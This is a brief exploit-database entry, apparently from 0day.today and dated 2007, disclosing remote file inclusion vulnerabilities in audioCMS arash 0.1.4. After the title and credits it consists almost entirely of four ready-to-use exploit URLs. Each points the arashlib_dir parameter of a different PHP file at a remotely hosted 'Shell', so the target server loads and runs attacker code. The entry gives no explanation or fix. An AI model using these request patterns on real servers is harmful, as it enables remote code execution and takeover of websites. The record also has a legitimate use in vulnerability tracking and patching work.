id: 1762
date: 04/14/2007
title: audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

=========================================================================
audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities
=========================================================================



# audioCMS arash 0.1.4(arashlib_dir)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/arash/
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/arash_lib/include/edit.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/include/list_features.inc.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_gadmin.class.php?arashlib_dir=Shell
# Exploit:[Path]/arash_lib/class/arash_sadmin.class.php?arashlib_dir=Shell



#  0day.today [2023-03-24]  #